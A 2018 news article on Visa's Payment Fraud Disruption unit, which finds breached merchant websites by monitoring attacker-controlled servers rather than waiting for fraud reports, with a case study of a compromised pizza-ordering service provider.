Visa turns a problem upside down to find malware
By Dzof Azmi May 29, 2018
- Observes the communication behaviour of malicious central servers to find potential victims
- Analysis of 255 malicious servers led to the discovery of 2,366 previously unidentified compromises
VISA'S never ending fight against fraud has moved up another notch. Attackers are migrating from targeting brick and mortar sites to online e-commerce systems.
But this new battleground has given an opportunity for the company to detect potential breaches in a new way. "We now don't need fraud reported to find breached websites," announced Penny Lane, Visa's VP of Payment Fraud Disruption (PFD), Global Risk at the recent Visa Security Summit in Singapore.
Currently, the majority of compromised merchants are identified after card users have made reports of fraud. The credit card company analyses the data and tries to identify a common point of purchase - which can take up to several months.
What Visa PFD is doing now is radically different. They are observing servers controlled by attackers, and using traffic analysis to identify business websites that have been compromised - which usually comes as news to the business owners.
An online wiretap
However, these malicious central servers are a weakness that Visa PFD can exploit. Once such server has been identified, they can observe it to see if the server connects to a legitimate business site, and then analyse the site to see if malware is present.
"When we go into the sites, we're not in any way hacking the merchant sites or using any privileges to get there," said Lane, explaining that they just look at the source code for the website. "It's the equivalent of driving by someone's house and seeing what colour it is."
If any signs of intrusion are detected, they will contact the business owner and advise accordingly.
A case study
In real life, their trials so far have shown positive results. In one example given, they received a tip that a pizza restaurant’s online ordering system had been breached.
By monitoring connections it made, they then realised it was a service provider breach and that 500 of the 1,500 clients connected to it were compromised by the same malware.
The pizza shop's and the service provider's systems were patched within eight business days. By analysing server transactions, it was determined that the original attack occurred 23 days earlier, but the issue was resolved without a single case of fraud being reported.
Lane estimated that if this threat had gone undetected, it had the potential to expose an estimated 225,000 accounts per month. Turning a problem upside-down, it seems, works.
"We're going from the bad guys and find our way down, rather than from the money lost and going back up," said Lane.
Greater threats ahead
Lane said that the programme is still in its early stages, but the results look promising. As of this moment, an analysis of 255 malicious servers led to the discovery of 2,366 previously unidentified compromises in nine months. "Frankly, we're overwhelmed by the number of breached websites we've found."
Apart from the skimming described earlier, Visa PFD also discovered malware that use your computer's resources for crypto mining, and even those capable of device infection (by using a popup requesting users to "update" a popular browser plug-in).
With the potential volume and complexity of the threat that faces them, Lane admitted that the eventual aim will be to have the whole workflow automated. She also stressed that this was only one of several initiatives run by Visa PFD to neutralise the threats facing them.
"We're going after the threat actors, we're trying to keep them on their toes as much as possible, we're disrupting their activities, we're going after them with law enforcement."